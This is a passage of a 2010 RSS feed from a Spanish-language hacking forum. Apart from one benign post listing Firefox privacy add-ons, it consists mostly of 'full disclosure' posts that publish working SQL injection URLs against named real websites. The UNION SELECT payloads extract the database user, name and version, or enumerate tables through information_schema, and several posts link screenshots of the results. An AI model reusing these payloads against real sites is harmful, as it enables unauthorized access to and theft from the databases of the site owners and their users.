<category>Cross Site Scripting (XSS, CSRF)</category><pubDate>Sun, 05 Sep 2010 11:44:53 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?32,7943,7943#msg-7943</guid>
<title>Que addons de seguridad y privacidad usan en firefox? (1 reply)</title><link>https://foro.undersecurity.net/read.php?32,7943,7943#msg-7943</link><description><![CDATA[Quiero que me ayuden a armar una lista con addons de seguridad y privacidad para instalar apenas instalo el navegador (en addons.mozilla.org hay 700+, demasiados)<br /><br />HTTP Request String Editor<br />https://addons.mozilla.org/en-US/firefox/addon/211337/<br />(todavia no lo probé, pero se ve interesante)<br /><br />calomel ssl validation<br />https://addons.mozilla.org/en-US/firefox/addon/207653/<br />(lo mismo)<br /><br /><br />Form History Control<br />https://addons.mozilla.org/en-US/firefox/addon/12021/<br />(lo mismo)<br /><br />NoScript<br />https://addons.mozilla.org/en-US/firefox/addon/722/<br />(esto deberia venir por default)<br /><br />adblock plus<br />https://addons.mozilla.org/en-US/firefox/addon/1865/?src=collection&amp;collection_id=d9031e34-6e4f-0956-3806-5134a373d9df<br /><br />BetterPrivacy<br />https://addons.mozilla.org/en-US/firefox/addon/6623<br /><br />flashblock<br />https://addons.mozilla.org/en-US/firefox/addon/433<br />(no lo probé porque noscript hace lo mismo y mas)<br /><br />RefControl<br />https://addons.mozilla.org/en-US/firefox/addon/953/<br /><br />force-tls<br />https://addons.mozilla.org/en-US/firefox/addon/12714/<br />(no lo probé)<br /><br />cuando pueda (en unas dos semanas) voy a probar los que no probé y voy a agregar algunos mas]]></description>
<dc:creator>seth</dc:creator>
<category>Dudas Generales</category><pubDate>Tue, 07 Sep 2010 18:23:50 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7942,7942#msg-7942</guid>
<title>[SQLI MYSQL] www.sinmaletas.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7942,7942#msg-7942</link><description><![CDATA[SQLI = http://www.sinmaletas.com/partners/colaborador.php?id=37+and+1=0+union+select+1,2,3,4,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11,12,13+--+<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/b5/b5a63c302d9d5d6a3927aace0e4dc183.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 19:18:55 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7941,7941#msg-7941</guid>
<title>[SQLI MYSQL] www.gamesinaflash.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7941,7941#msg-7941</link><description><![CDATA[SQLI = http://www.gamesinaflash.com/game.php?id=48+and+1=0+union+select+1,2,3,4,5,6,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,8,9,10,11,12,13,14,15,16,17,18<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/80/806ae1b732d4a2bc1126828b3a8cc7d7.png&amp;w=1024&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 19:14:10 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7939,7939#msg-7939</guid>
<title>[SQLI MYSQL] www.brainmelt.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7939,7939#msg-7939</link><description><![CDATA[SQLI = http://www.brainmelt.com/game.php?id=8+and+1=0+union+select+1,2,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13+--+<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/4a/4a866521b1556c286ea46816f03e61e8.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 18:16:45 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7938,7938#msg-7938</guid>
<title>[SQLI MYSQL] www.codeglue.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7938,7938#msg-7938</link><description><![CDATA[SQLI = http://www.codeglue.com/game.php?id=1+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+<br /><br /><br /><br />IMAGN = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/6d/6deb3f2665d7411264704c1c1e8fe0fc.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 18:12:54 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7937,7937#msg-7937</guid>
<title>[SQLI MYSQL] www.splashworks.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7937,7937#msg-7937</link><description><![CDATA[http://www.splashworks.com/game.php?id=49+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11+--+]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 18:06:58 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7936,7936#msg-7936</guid>
<title>[SQLI MYSQL] www.yoquierogames.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7936,7936#msg-7936</link><description><![CDATA[SQLI = http://www.yoquierogames.com/games.php?id=98+and+1=0+union+select+1,2,3,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12,13<br /><br /><br /><br />IMAGN = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/4e/4e8c66d54d2db9c67e84a50921e4ee21.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 18:02:46 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7935,7935#msg-7935</guid>
<title>[SQLI MYSQL] www.artistsincanada.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7935,7935#msg-7935</link><description><![CDATA[http://www.artistsincanada.com/php/article.php?id=339+and+1=0+union+select+1,2,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13<br /><br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/7d/7d3dbcc1dc4f16d729f86d51a7895822.png&amp;w=1024&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 14:52:36 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7934,7934#msg-7934</guid>
<title>[SQLI MYSQL] www.museum.ge (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7934,7934#msg-7934</link><description><![CDATA[http://www.museum.ge/web_page/index.php?id=39-1+union+select+0,group_concat%28table_name%29,2,3,4,5,6,7,8+from+information_schema.tables--<br /><br /><br /><br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/be/be67282c88d6e1f70f2d0ae873e126da.png&amp;w=1024&amp;q=0&amp;enc=png" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 14:46:13 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7933,7933#msg-7933</guid>
<title>[SQLI MYSQL] www.citricagency.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7933,7933#msg-7933</link><description><![CDATA[http://www.citricagency.com/indexbook/noticia.php?id=48-1+union+select+0,table_name+from+information_schema.tables--]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 14:37:46 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7932,7932#msg-7932</guid>
<title>[SQLI MYSQL] www.avatarity.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7932,7932#msg-7932</link><description><![CDATA[http://www.avatarity.com/avatar.php?aid=3043+and+1=0+union+select+1,2,3,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+<br /><br /><br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/98/98ccb5b10ae7cf1cafb6a6a9f661eeb6.png&amp;w=1024&amp;q=0&amp;enc=" class="bbcode" border="0" /><br /><br />Nuevo metodo de post con imagen :)]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sat, 04 Sep 2010 14:08:18 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7929,7929#msg-7929</guid>
<title>[SQLI MYSQL] www.welcomesalta.com.ar (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7929,7929#msg-7929</link><description><![CDATA[http://www.welcomesalta.com.ar/es/salta.php?id=11+and+1=0+union+select+1,user%28%29,3,4,5,6,7+--+]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Thu, 02 Sep 2010 21:52:18 -0400</pubDate></item>
</channel>
</rss>